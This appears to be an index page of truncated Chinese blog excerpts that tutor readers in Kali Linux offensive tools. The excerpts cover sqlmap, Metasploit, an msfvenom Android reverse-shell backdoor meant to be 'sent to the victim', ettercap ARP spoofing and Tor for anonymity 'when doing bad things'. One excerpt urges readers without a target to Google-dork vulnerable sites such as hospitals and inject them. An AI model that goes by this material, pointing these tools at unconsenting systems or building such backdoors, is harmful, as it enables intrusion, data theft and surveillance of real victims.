Kali Linux默认并没有安装SSH服务，为了实现远程登录Kali Linux，我们需要安装SSH服务。 安装 OpenSSH Server # apt-get install openssh-server 配置SSH服务开机启动 # update-rc.d -f ssh remove # update-rc.d -f ssh defaults # update-rc.d -f ssh enable 2 3 4 5 更改默认的SSH密钥 # cd /etc/ssh # mkdir ssh_key_backup # mv ssh_host_* ssh_key_backup 创建新密钥： # dpkg-reconfigure openssh-server 允许root用户使用ssh远程登录 默认下，不允许……

HTTrack可以克隆指定网站－把整个网站下载到本地。 可以用在离线浏览上，也可以用来收集信息（甚至有网站使用隐藏的密码文件）。 一些仿真度极高的伪网站（为了骗取用户密码），也是使用类似工具做的。 Kali Linux默认安装了HTTrack。 HTTrack帮助： # httrack --help 使用示例： # httrack http://topspeedsnail.com -O /tmp/topspeedsnail……

你要做坏事时，最先应该想到匿名。扫描网站／主机，或利用漏洞；甚至在大天朝发帖都有风险，为了防止半夜鬼敲门，我们可以使用tor实现匿名。 如果你不知道tor是什么，看：https://zh.wikipedia.org/wiki/Tor ； https://program-think.blogspot.com/2013/11/tor-faq.html 图示： 在天朝也许要多加一层： 优点： 首先有了一个……

sqlmap是开源的SQL注入自动攻击工具，它可以自动的探测SQL注入点并且进一步控制网站的数据库。 Kali Linux默认安装了这个工具。 找到潜在的攻击目标 第一步是找到有SQL注入漏洞的网站。如果你没有特定攻击目标，可以使用Google搜索 php?id=1 （或php?id= ＋ xx系医院）： 找到结果中……

Metasploit提供了很多辅助的模块，非常实用。今天介绍一个叫search_email_collector的模块，它的功能是查找搜索引擎（google、bing、yahoo），收集和某个域名有关的邮箱地址。 使用步骤： 启动msfconsole： # service postgresql start # msfconsole 搜索模块： msf > search gather auxiliary 找……

Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。 Lynis是流行可靠的安全扫描工具。 前不久，Lynis更新了版本，Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的……

Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit，或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。 我使用的系统是Kali Linux，本文以这个系统为例。 图形用户界面接口：Armitage 命令行接口……

我使用Kali Linux的IP地址是192.168.0.112；在同一局域网内有一台运行Windows XP（192.168.0.108）的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole： # msfconsole 选择一个漏洞： msf > search platform: windows xp sp3 explo……

文本演示怎么使用Kali Linux入侵Android手机。 Kali Linux IP地址：192.168.0.112；接收连接的端口：443。 同一局域网内android手机一部(android 5.1) 创建一个后门程序 在终端中执行： # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk 这个后门程序(APK)是发送给受害者的；要把上面命令的IP……

ettercap是执行ARP欺骗嗅探的工具，通常用它来施行中间人攻击。 我还介绍过另一个arp欺骗工具-arpspoof 我使用的是Kali Linux 2.0；在开始使用ettercap之前，先配置一下： 编辑配置文件/etc/ettercap/etter.conf： # vim /etc/ettercap/etter.conf 找到privs一段，改……